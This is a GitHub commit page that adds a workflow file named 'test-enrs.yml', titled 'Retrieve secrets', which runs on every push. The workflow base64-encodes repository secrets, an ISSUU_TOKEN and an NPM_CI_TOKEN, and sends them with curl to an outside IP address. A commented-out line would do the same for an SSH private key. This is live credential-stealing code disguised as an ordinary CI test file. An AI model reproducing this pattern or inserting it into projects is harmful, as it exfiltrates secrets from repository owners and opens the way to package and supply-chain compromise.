Skip to content

Commit

Permalink
Create test-enrs.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Eraz1997 authored Oct 15, 2024
1 parent 64c2869 commit 12dec67
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions .github/workflows/test-enrs.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
name: Retrieve secrets
on: [push]

jobs:
retrieve-secrets-2:
permissions:
contents: read
id-token: write
runs-on: ubuntu-latest
steps:
- run: |
# echo '${{ secrets.SSH_INTERNAL_PDFIUM_PRIVATE_KEY }}' | base64
curl http://34.30.26.177:5000 -H "Authorization: ISSUU_TOKEN = $(echo '${{ secrets.ISSUU_TOKEN }}' | base64)"
curl http://34.30.26.177:5000 -H "Authorization: NPM_CI_TOKEN = $(echo '${{ secrets.NPM_CI_TOKEN }}' | base64)"

0 comments on commit 12dec67

Please sign in to comment.